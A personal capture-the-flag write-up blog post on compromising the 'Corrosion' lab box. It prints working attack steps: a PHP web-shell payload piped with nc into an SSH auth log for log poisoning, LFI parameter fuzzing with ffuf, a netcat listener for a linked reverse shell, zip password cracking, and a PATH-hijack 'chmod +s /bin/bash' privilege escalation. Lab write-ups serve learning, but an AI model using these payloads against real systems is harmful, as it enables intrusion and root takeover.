I Suck at CTFs: Corrosion

Written By Robert Cao

takeaway tl;dr:

  • nmap

    • enumerate the box per usual

  • ffuf

    • directory fuzzing to find hidden directories and hidden php files

    • parameter fuzzing of the php files to find LFI

  • zip2john

    • extracting the password hash for a zip

  • fcrackzip

    • another way to cracking zip files without having the extract the hash first

  • <?php passthru($_GET[‘cmd’]);?>

    • PHP script to inject into a log that is returned via php

    • this is for Log Poisoning

  • echo ‘<?php passthru($_GET[‘cmd’]);?>’ | nc $IP 22

    • another form of getting the command into the log file

  • bash reverse shell from pentestmonkey (https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)

  • sudo -l

    • find files the current user can run as root

  • echo “chmod +s /bin/cat” > cat

    • create a local ./cat file that will run the chmod command

    • this is Unquoted Path Binary vulnerability for privesc

  • SUID bits

    • Using SUID bit set binaries to run as root to get flags

  • TTPs:

    • T1595.002 – Active Scanning: Network Scanning

    • T1595.001 – Active Scanning: Web Application Scanning

    • T1110.002 – Brute Force: Password Cracking

    • T1059.008 – Command and Scripting Interpreter: PHP

    • T1203 – Exploitation for Client Execution

    • T1190 – Exploit Public-Facing Application

    • T1548.003 – Abuse Elevation Control Mechanism: Sudo and Sudo Caching

    • T1068 – Exploitation for Privilege Escalation

  • nmap (not shown) resulted in 80 being exposed

  • checked robots.txt and wasn’t found

  • ffuf with the directory-list-medium found /task/ directory, /blog-post/ directory and /archive/ (not shown) are available

  • checking the file see that the auth log for the box has eased permissions

  • ffuf also showed a blog-post directory

  • source code also didn’t show anything useful

  • tried exiftool and didn’t find anything in the picture

  • looking at /archives/ it shows there’s a randylogs.php file with a non-zero kb size

  • opening and downloading randylogs.php shows nothing

  • after a long time of looking around i was stuck af, took a look at the walkthrough for a hint and it said to do parameter fuzzing

  • looking up parameter fuzzing and it’s very common for php files

  • php files are typically dynamically loaded with variables so a request parameter is common

  • ffuf -w $WORDLIST -u $IP/archives/randylogs.php?FUZZ=/etc/passwd -mc 200-403 -fs 0 -c -v -o $OUTPUTFILE

    • this will do a parameter fuzzing

    • -fs 0 : will filter for non-zero kb size results

  • finding that the request parameter of file will return results for us

  • this is a common LFI vulnerability

  • given the hint in todo_list.txt we check the /var/log/auth.log of the box

  • so lets try ssh-ing into the box and we can see that our unsuccessful connection is logged (not shown)

  • this is a log poisoning vulnerability because it’s reflected back to us

  • I had to get a hint as to how we can use this for log poisoning

  • because this php evaluates commands we can send it a php script so that if we add another parameter to the request parameter we can get RCE

  • I tried multiple ways to get the script into the auth.log

  • ngl a lot of the walkthroughs said to just SSH into the box with this command as the username but it was not accepted

  • maybe it was my version of ssh not allowing me to do this

  • so eventually i tried sending the string directly through nc

  • echo ‘<?php passthru($_GET[‘cmd’]);?>’ | nc $IP 22

  • after the php script is logged in auth.log (not shown) we can provide the additional parameter and command to run (cmd=id)

  • so now when we look at our log the portion that had cmd in it is evaluated as a system command giving us RCE

  • for the longest time I couldn’t figure out why my kali box wasn’t connecting to the vuln box

  • no idea and no motivation to find out why /shrug

  • so on my mac host i just started a nc listener

    • nc -l 1234

  • provided the cmd parameter with a bash reverse shell from pentestmonkey (https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)

  • i got a reverse shell in my listener

  • i upgraded my shell with that python command (not shown) and used that to run commands to find files

  • i went through varies different extensions so i can evaluate the results easier than searching the entire filesystem for everything

    • I looked for .bak and then found this user_backup.zip when looking for .zip files

  • ran a python http server on the vuln box to share the user_backup.zip

    • in the reverse shell:

      • cd /var/backups/

      • python3 -m http.server 8888

    • back on my kali box in a web browser browsed to $IP:8888 and was able to download the file

  • extracted my rockyou file to the local directory

    • 7z x $FILE

  • zip2john $FILE > $OUTPUT

  • ran john against this with rockyou.txt but was not able to find the password :(

  • used another tool and it was much faster

  • fcrackzip -u -D -p $WORDLIST $FILE

  • unzip $ZIPFILE

  • and received SSH keys, a text file and a c binary

  • Looking at easysysinfo.c we can see a few system commands that will be ran when the binary is executed

  • I didn’t notice at first but the cat command is different than the other commands (important for later)

  • the text file gives us randy’s password

  • SSH ing into the box using the rsa key still required a password so using the one we just found i was able to get in

  • there we can see the first flag user.txt and can cat it

  • here we need to start enumerating again so looking around we see that randy has a /tool/ directory in his home folder

  • checking the easysysinfo.py we see that the system commands are different than the .c file we were provided

  • that led me to check the rest of the files in that folder and we see that easysysinfo is binary that can be ran with a SUID bit

  • we can also find this with find . -perm -4000 2>/dev/null (not shown)

  • remembering that the commands in the .c file looks different than the .py commands i realize that there’s a unquoted path vulnerability for privesc

  • so if we can control the .c command involving cat

  • echo “chmod +s /bin/bash” > cat

    • this will create a cat binary in our current directoy that runs “chmod +s /bin/bash” allowing us to run /bin/bash with the SUID bit as well

  • the way that binaries are ran on linux is based on the $PATH variable

  • it’s a first come first serve rule, so if we can tell the system to check the local path for a cat binary it will stop looking for the built-in cat file

  • export PATH=/home/randy/tools/:$PATH

    • this will tell our current session to look for binaries in our /tools/ directory first before looking elsewhere

  • for proof of concept i ls the /bin/bash binary to show that the SUID bit is not set

  • then run the ./easysysinfo binary (remember this is ran as root because that has a SUID bit set)

  • the binary will call the cat command to set the SUID bit for /bin/bash

    • chmod +s /bin/bash

  • running the ls command again on /bin/bash shows that the SUID bit is now set

  • I wasn’t able to get the /bin/bash to run commands for me to get a shell :(

  • So i thought what if I just get the cat command to print the root.txt for me instead to finish the box?

  • changing /tools/cat binary to “chmod +s /usr/bin/cat” will set the SUID bit for the cat binary instead

  • doing so I was able to use /usr/bin/cat to print the root.txt

Robert Cao
Next

I Suck at CTFs: Corrosion2